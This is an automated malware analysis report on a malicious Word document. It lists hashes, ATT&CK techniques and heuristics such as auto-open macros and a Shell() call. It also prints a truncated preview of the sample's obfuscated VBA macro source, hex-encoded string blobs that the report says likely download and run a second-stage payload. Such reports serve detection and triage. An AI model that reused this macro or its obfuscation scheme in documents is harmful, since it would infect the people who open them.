Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 296acfa7a833fe3b…

MALICIOUS

Office (OLE)

131.0 KB Created: 2018-02-05 22:44:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: 46be31f0886af659fd55e876ba4fa64f SHA-1: 57bf61a80490a2de5042f1264f83c2aa2c7c1697 SHA-256: 296acfa7a833fe3b1f562e78065ef1a49d1e46a42961e1f6ee29dd6bd197b9fa
264 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is an Office document containing VBA macros, including a Document_Open and Workbook_Open macro, which are known to be used for malicious purposes. The critical OLE_VBA_SHELL heuristic indicates the use of the Shell() function, suggesting the execution of arbitrary code. The macros appear to be obfuscated, but the presence of these heuristics strongly suggests the file's intent is to download and execute a second-stage payload.

Heuristics 8

  • ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7305 bytes
SHA-256: 5bb02c0447cd5b0faf6f645c700640fe4a23251d5f746a71ec608ffa14e43428
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 23 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

Public Sub FJ_X()
   Dim ZPA_BT As String
   Dim R_UWS As String
   Dim YZP_PI As Long
    Dim N_DW As String
N_DW = N_DW + "AEADB5A"
N_DW = N_DW + "3B0B1A6"
N_DW = N_DW + "A3AAAA6"
N_DW = N_DW + "CA3B6A3"
N_DW = N_DW + "5E6B95A"
N_DW = N_DW + "7ACA2AD"
N_DW = N_DW + "B591B2B"
N_DW = N_DW + "7AAA35E"
N_DW = N_DW + "86A7A2A"
N_DW = N_DW + "2A3AC5E"
N_DW = N_DW + "6BACADA"
N_DW = N_DW + "EB0ADA4"
N_DW = N_DW + "A7AAA35E"
N_DW = N_DW + "87A45E66B2A3B1B26BAE9FB2A65E5E62A3ACB4787F8E8E827F927F5E695E659AB56EA9AA6CA3B6A365675EB990A3ABADB4A36B87B2A3AB5E5E62A3ACB4787F8E8E827F927F5E695E659AB56EA9AA6CA3B6A365BB795E628D"
Dim G_S As String
G_S = "83898F825E7B5E8CA3B56B8DA0A8A3A1B25E91B7B1B2A3AB6C8CA3B26C95A3A081AAA7A3ACB2795E628D83898F826C86A39FA2A3B0B1996593B1A3B06B7FA5A3ACB2659B5E7B5E659391906B898A65795E628D83898F826C"
Dim K_ZK As String
K_ZK = "82ADB5ACAAAD9FA284A7AAA36665A6B2B2AEB1786D6DB1A3AEAEB0ADA26CA1ADAB6DA8B2A4ADB0A1A39DB1A7A5ACA3A26CA3B6A3656A5E62A3ACB4787F8E8E827F927F5E695E659AB56EA9AA6CA3B6A36567795E668CA3B5"
Dim OYL_T As String
OYL_T = "6B8DA0A8A3A1B25E6BA1ADAB5E91A6A3AAAA6C7FAEAEAAA7A19FB2A7ADAC676C91A6A3AAAA83B6A3A1B3B2A36662A3ACB4787F8E8E827F927F5E695E659AB56EA9AA6CA3B6A36567795E91B2ADAE6B8EB0ADA1A3B1B15E6B87A25E628EA7A25E6B84ADB0A1A3"
 Dim ZH_UGA As String
  ZH_UGA = N_DW & G_S & K_ZK & OYL_T

    GoTo x2
x1:
    Dim RAX_WEH As String
RAX_WEH = "7D7C7D7D657D7D7D857D7B7D5C757D7D7D6D7D7D57AC9C61AF7D55A2447DBC7D765E7DBA7C7D437D7D5F9763477D4A7D767D7D7D62A69A7D607DAC7E5E7D4C7D7DA44E5A7D657D6D898B437DA65748B47D7D447D7D527D757D7D7D75547D3E7D557D7D7D7D5A7DB97D7D59957D8B477D7DB05F7D8A7D7D"
Dim CII_Q As String
CII_Q = "7DAAA77D7D577D8A7E7D7DAAA27D7D517D7D7D797D7D7D797DB15C597D757D7D7D427D7D7D997D5A7D547DA37D9D9D7D4B40B97D4E7D7D6C7D607D7DAB465A857DA97D3F7D7DB48B5D7D7D7D7D7D517D977D738D7D507D49629149777DB89F4C7D5C7D7D7D7DBAAC427D7D806C7D967D4D79857D7D7D7D"
Dim NJ_TK As String
NJ_TK = "7D7D7D7B7D7B7D7DAA7D6A7D495D7D927D884D7D7D7D7D5A68A8707D787D7D95AD807D7C7D7D7D7D7DB1A47D7D7D857D844A7D7D547D8A80AA5179B07D7D6C6D7D7D7D7D547D517D7DA767987778617DBD6CB9407E7D7D7D7DB77D7DB66D7D76AF6D7E7D7D6E683EB0BD4E80607D707D567D65917D6BB0"
Dim LC_XUF As String
LC_XUF = "5C595B57A67D925C7DB67D7D487D7D7D8C41B97D7D7D92B353847D7D467D7D827D60B87D557D6F5C9FAE7D6F7D657DA37D8D757D7D7DA5415F7D7D7DA87D8C7D517D757F87AE9D4E7D82565C7D59626E8C8D7D487D7D72517D7BAF7D7D7D7D967D47B67D7D4C7D6B907D7BA17D417D7DADA47D597D828E"
Dim O_TK As String
O_TK = "9EB6627D4A7D7D747DBB7D837DAA7D7D9FB77D7DB37D657D827D9CB0A37D987D7D557DBAAB7D6C7D947D7D697D467D407D887D7D7D967D7D427D5E717D727DA37D757D6A507D887D7D7D7D7D7D797D997D587D7D479E6A7D7DA7564B7D7DAD537D4B7DA27D7DB677787D7D577D3E627D6F7D66577D7D7D"
Dim FRT_OOM As String
FRT_OOM = "9D7D7DA6A57AA74CA07D737DA87D7D7D7D7DB27D507D837D7DA8947374A47D437F714D7D7D697D7D7D7D905F7D8E90B4657D706A8A7D4F617D9E7D7D4A7D7DA9AE7D837D7D7D8640997D7DA873A3557D4C7F717D7D607D7D7DB5417D867D7D5F497D7D7E957D677D7D9A6EAF688C7D6B7D7D767D7DBD7D"
Dim KBM_W As String
KBM_W = "7D3E7D7D7D7D7D4A7D5197A47D7D7D877D7D7D7D7DB067B4BB7D4C7D4C928D6F7A8C9556687E59B0627D547D64707D7D7D7D437D7D7DAA7D7D7D717D7D9D7D7D48727DBD7D6EB77D7D917D7D99728D897D787D4D8C92B58E7D7DAE7D4B667D7D4B957D7DB180807D7DBD90A4947D70B1777D7D7D7D7DAE"
Dim U_HV As String
U_HV = "7D7DAC7D7D7D7DB6BC7D7D41879B7D7D3E7D7D3F4F7D807D7DA463697D62AF7D7372437DB87D7D447D7D7D6D677D4F887D7D4F7D7D7DB1986F7DB091902A8B5951677D4ABA417D7D6BA4B39FA57D527D8C7D9D847D7D7D888779777D7D7D7D51537D7D7B6A7D727D827D7D7D7D7D7DAFB2657D7D7D7D7D"
Dim BTL_PI As String
BTL_PI = "707D537DBD7D7D927D7D7D607D69AC7D837D8F7D8A8FB04EB07D7D7B7D513EB97D7D7D7D7D9F67B36F4EA97D907C7DA57D977DAE7DB9907D7D4A7D6954777D7D6667527D7D607D6F6649597E457F5EAF7D7D7D924884967B5D7C7DB27D9C7D8A7D7D6668657DB07DB8867D9E4
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.